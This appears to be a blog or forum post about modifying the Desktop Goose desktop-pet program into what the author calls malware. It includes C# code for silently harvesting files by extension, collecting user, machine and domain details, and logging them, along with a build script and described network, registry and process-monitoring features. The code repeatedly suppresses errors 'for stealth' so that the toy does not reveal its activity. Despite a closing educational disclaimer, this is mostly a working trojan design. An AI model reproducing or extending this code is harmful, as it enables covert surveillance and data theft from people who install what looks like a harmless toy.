Questioning myself on how things work... I've been diving deep into malware research and cybersecurity education, specifically working with the Desktop Goose application for educational purposes. Been working on this Desktop Goose project for a while now. It's been interesting trying to figure out how to make it actually useful for malware research and cybersecurity education while keeping it fun. The original Desktop Goose is just a silly desktop pet, but I wanted to see if I could make it do real work.
Been questioning myself about how it actually works under the hood too. Figured I'd write up both the development experience and technical details in one post. This thing is pretty interesting from both perspectives.
So I started by decompiling the original executable and looking at the source code. That was a mess - decompiled code is always a pain to work with. Missing dependencies, incomplete methods, all the usual decompilation issues. But I managed to get it working and then started adding real functionality.
The main challenge was making sure it wouldn't crash when things went wrong. I added file operations, system monitoring, network communication, registry access, and process monitoring. But the key was wrapping everything in try-catch blocks so it fails silently and just goes back to being a normal goose if something breaks.
I also had to figure out the configuration system. The original uses a simple config file, so I made it backward compatible. If you use the old config format, it just disables all the enhanced features and works exactly like the original. But if you enable the new features, it can do some pretty interesting stuff.
The original Desktop Goose is a Windows Forms application written in C# targeting .NET Framework 4.0. The goose uses a task-based AI system. Each task is an enum value, and the main AI loop randomly selects tasks based on weighted probabilities. Here's how I extended it:
// Original task enum with new enhanced tasks
public enum GooseTask
{
Wander,
NabMouse,
CollectWindow_Meme,
TrackMud,
CollectFiles,
MonitorSystem,
NetworkCommunicate,
RegistryAccess,
ProcessMonitor
}
// Task selection with enhanced features
private static GooseTask[] gooseTaskWeightedList = new GooseTask[13]
{
GooseTask.Wander,
GooseTask.Wander,
GooseTask.Wander,
GooseTask.NabMouse,
GooseTask.CollectWindow_Meme,
GooseTask.TrackMud,
GooseTask.TrackMud,
GooseTask.CollectFiles,
GooseTask.MonitorSystem,
GooseTask.NetworkCommunicate,
GooseTask.RegistryAccess,
GooseTask.ProcessMonitor,
GooseTask.ProcessMonitor
};
I built a backward-compatible configuration system that handles both original and enhanced formats. The key was making it work with the original Version=0 config while supporting new features:
// Backward compatibility handling
if (result == 0)
{
// Original config format - disable enhanced features
f.EnableFileOperations = false;
f.EnableNetworkOperations = false;
f.EnableSystemInfoCollection = false;
f.EnableProcessMonitoring = false;
f.EnableRegistryAccess = false;
}
// Enhanced config structure
public class ConfigSettings
{
// Original settings
public float MinWanderingTimeSeconds = 20f;
public float MaxWanderingTimeSeconds = 40f;
public bool CanAttackAtRandom = true;
// Enhanced settings
public bool EnableFileOperations = false;
public bool EnableNetworkOperations = false;
public bool EnableSystemInfoCollection = false;
public bool EnableProcessMonitoring = false;
public bool EnableRegistryAccess = false;
// File operation settings
public string TargetDirectories = "";
public string FileExtensions = "*.txt,*.doc,*.pdf";
public bool RecursiveFileSearch = false;
public int MaxFileSizeKB = 1024;
}
The file operations are probably the most useful. It can scan directories, look for specific file types, and collect information about what it finds. System monitoring gives you OS info, machine details, memory usage - basic stuff but useful for malware analysis and system reconnaissance. Network communication lets it connect to remote servers and send data. Registry access can enumerate Windows registry keys. Process monitoring checks if specific processes are running.
Here's how the file operations work:
private static void RunCollectFiles()
{
try
{
if (!GooseConfig.settings.EnableFileOperations)
{
TheGoose.ChooseNextTask();
return;
}
// Get target directories from config
string[] directories = GooseConfig.settings.TargetDirectories.Split(',');
string[] extensions = GooseConfig.settings.FileExtensions.Split(',');
foreach (string directory in directories)
{
if (Directory.Exists(directory))
{
// Search for files with specified extensions
foreach (string extension in extensions)
{
string[] files = Directory.GetFiles(directory, extension,
GooseConfig.settings.RecursiveFileSearch ?
SearchOption.AllDirectories : SearchOption.TopDirectoryOnly);
foreach (string file in files)
{
FileInfo fileInfo = new FileInfo(file);
if (fileInfo.Length <= GooseConfig.settings.MaxFileSizeKB * 1024)
{
// Collect file data
DataCollector.AddFileData(file);
}
}
}
}
}
}
catch (Exception ex)
{
// Silent fail for stealth
TheGoose.ChooseNextTask();
}
}
The system monitoring collects real OS information using the Environment class and GC for memory data:
private static void RunMonitorSystem()
{
try
{
// Collect real system information
string osInfo = Environment.OSVersion.ToString();
string machineName = Environment.MachineName;
string userName = Environment.UserName;
string domainName = Environment.UserDomainName;
int processorCount = Environment.ProcessorCount;
long memorySize = GC.GetTotalMemory(false);
// Add to system info list
TheGoose.taskMonitorSystemInfo.systemInfo.Add($"OS: {osInfo}");
TheGoose.taskMonitorSystemInfo.systemInfo.Add($"Machine: {machineName}");
TheGoose.taskMonitorSystemInfo.systemInfo.Add($"User: {userName}");
TheGoose.taskMonitorSystemInfo.systemInfo.Add($"Domain: {domainName}");
TheGoose.taskMonitorSystemInfo.systemInfo.Add($"Processors: {processorCount}");
TheGoose.taskMonitorSystemInfo.systemInfo.Add($"Memory: {memorySize / 1024 / 1024} MB");
// Collect system data
DataCollector.AddSystemData();
}
catch (Exception ex)
{
// Log error silently for stealth
}
}
I built a centralized DataCollector class that handles all data collection and export. The data collection is pretty cool - it creates a file on the desktop with all the information it gathers. File paths, system details, network connections, registry data, process status - everything gets logged. Useful for malware analysis and cybersecurity research.
public static class DataCollector
{
private static string dataFilePath = Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.Desktop),
"goose_data.txt");
private static List<string> collectedData = new List<string>();
private static object lockObject = new object();
public static void AddData(string dataType, string data)
{
lock (lockObject)
{
string entry = $"[{DateTime.Now}] {dataType}: {data}";
collectedData.Add(entry);
// Write to file immediately for persistence
try
{
File.AppendAllText(dataFilePath, entry + Environment.NewLine);
}
catch
{
// Silent fail for stealth
}
}
}
public static void AddFileData(string filePath)
{
AddData("FILE", filePath);
}
public static void AddSystemData()
{
AddData("SYSTEM", $"OS:{Environment.OSVersion}, " +
$"Machine:{Environment.MachineName}, " +
$"User:{Environment.UserName}");
}
public static void AddNetworkData(string server, int port, bool connected)
{
AddData("NETWORK", $"Server:{server}:{port}, Connected:{connected}");
}
public static void AddRegistryData(string keyPath, string valueName, object value)
{
AddData("REGISTRY", $"Key:{keyPath}, Value:{valueName}={value}");
}
public static void AddProcessData(string processName, bool isRunning)
{
AddData("PROCESS", $"Process:{processName}, Running:{isRunning}");
}
}
The key to making this work reliably was comprehensive error handling. Every enhanced feature is wrapped in try-catch blocks that fail silently. If any enhanced feature fails, it just falls back to being a normal Desktop Goose. The error handling ensures it won't crash or give away that it's doing anything unusual.
// Example error handling pattern
private static void RunEnhancedFeature()
{
try
{
if (!GooseConfig.settings.EnableFeature)
{
TheGoose.ChooseNextTask();
return;
}
// Enhanced feature code here
// ... implementation ...
}
catch (Exception ex)
{
// Silent fail for stealth - fall back to original behavior
TheGoose.ChooseNextTask();
}
}
I built a clean file distribution system too. Instead of dumping the entire source code, I just included the essential files needed to compile it on Windows. Twelve files total - config, build script, project files, and documentation. Much cleaner that way.
The testing was the hardest part. I wrote comprehensive guides for testing everything - configuration compatibility, compilation on Windows, runtime behavior, error handling, data collection, and stealth operation. Six different phases of testing to make sure it actually works reliably.
@echo off echo Building Enhanced Desktop Goose... REM Build the solution msbuild GooseDesktop.sln /p:Configuration=Release /verbosity:minimal REM Copy configuration file copy config.goos bin\Release\ REM Copy assets xcopy Assets bin\Release\Assets\ /E /I /Y echo Build complete! Check bin\Release\GooseDesktop.exe pause
I'm pretty happy with what we have so far. It maintains the playful nature of the original Desktop Goose but adds real functionality for malware research and cybersecurity education. The error handling means it won't crash or give away that it's doing anything unusual. And the backward compatibility means it works exactly like the original if you don't enable the enhanced features. This is still a work in progress so please be kind and share your thoughts or findings if you decide to partake.
Pretty cool how a silly desktop pet can be turned into malware while maintaining its playful nature. The technical challenges were interesting - decompilation issues, backward compatibility, stealth operation, and reliable data collection. But it all came together nicely.
You can check out the full implementation here: Enhanced Desktop Goose - File Browser & Downloads
These contents are for malware research, cybersecurity education, and computer science study only. Use only on devices you own or have explicit permission to test on.